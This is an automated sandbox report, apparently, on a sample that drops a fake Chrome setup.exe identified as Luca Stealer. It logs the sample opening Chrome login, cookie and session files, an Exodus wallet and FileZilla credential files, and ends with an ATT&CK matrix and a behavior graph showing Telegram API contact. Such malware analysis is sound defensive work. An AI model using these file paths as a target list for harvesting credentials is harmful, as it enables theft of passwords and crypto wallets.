            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\000003.log\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\CURRENT\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\MANIFEST-000001\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13305162911919181\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\000003.log\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13305162907188466\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENT\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\NetworkDataMigrated\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Trusted Vault\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\MANIFEST-000001\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13305162911717793\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\MANIFEST-000001\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\CURRENT\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\CURRENT\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Media History\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOCK\Login DataJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior

            Remote Access Functionality

            barindex
            Yara detected Luca Stealer
            Source: Yara matchFile source: 12.0.setup.exe.7ff610e90000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.setup.exe.7ff610e90000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000000.275348795.00007FF611186000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.304112093.00007FF611186000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Program Files\Google LLC\Google Chrome\setup.exe, type: DROPPED

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Replication Through Removable Media            		31
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            System Time Discovery            		1
            Replication Through Removable Media            		1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Web Service            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts2
            Native API            		1
            Windows Service            		1
            Windows Service            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory11
            Peripheral Device Discovery            		Remote Desktop Protocol3
            Data from Local System            		Exfiltration Over Bluetooth1
            Ingress Tool Transfer            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		11
            Process Injection            		2
            Obfuscated Files or Information            		Security Account Manager1
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
            Encrypted Channel            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts2
            PowerShell            		Logon Script (Mac)1
            Registry Run Keys / Startup Folder            		1
            Timestomp            		NTDS36
            System Information Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer3
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            Query Registry            		SSHKeyloggingData Transfer Size Limits14
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            File Deletion            		Cached Domain Credentials151
            Security Software Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items33
            Masquerading            		DCSync1
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job41
            Virtualization/Sandbox Evasion            		Proc Filesystem41
            Virtualization/Sandbox Evasion            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
            Process Injection            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
            Remote System Discovery            		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1305316 Sample: bb.exe Startdate: 07/09/2023 Architecture: WINDOWS Score: 100 70 Found malware configuration 2->70 72 Multi AV Scanner detection for dropped file 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 5 other signatures 2->76 8 bb.exe 66 2->8         started        11 msiexec.exe 112 45 2->11         started        process3 file4 36 C:\Users\user\AppData\...behaviorgraphoogle Chrome.aiui, PE32 8->36 dropped 38 C:\Users\user\AppData\Local\...\shi269F.tmp, PE32+ 8->38 dropped 40 C:\Users\user\AppData\Local\...\MSI43F8.tmp, PE32 8->40 dropped 48 14 other malicious files 8->48 dropped 13 bb.exe 11 8->13         started        42 C:\Windows\Installer\MSIFEB8.tmp, PE32 11->42 dropped 44 C:\Windows\Installer\MSIFCA4.tmp, PE32 11->44 dropped 46 C:\Windows\Installer\MSIFC17.tmp, PE32 11->46 dropped 50 4 other malicious files 11->50 dropped 16 setup.exe 16 11->16         started        20 msiexec.exe 11->20         started        22 msiexec.exe 4 11->22         started        process5 dnsIp6 52 C:\Users\user\AppData\Local\...\shiF4D1.tmp, PE32+ 13->52 dropped 54 C:\ProgramData\Caphyon\...behaviorgraphoogle Chrome.exe, PE32 13->54 dropped 56 api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom 16->56 58 ipwho.is 108.181.47.111, 443, 49730 ASN852CA Canada 16->58 60 Suspicious powershell command line found 16->60 62 Tries to harvest and steal ftp login credentials 16->62 64 Tries to harvest and steal browser information (history, passwords, etc) 16->64 68 2 other signatures 16->68 24 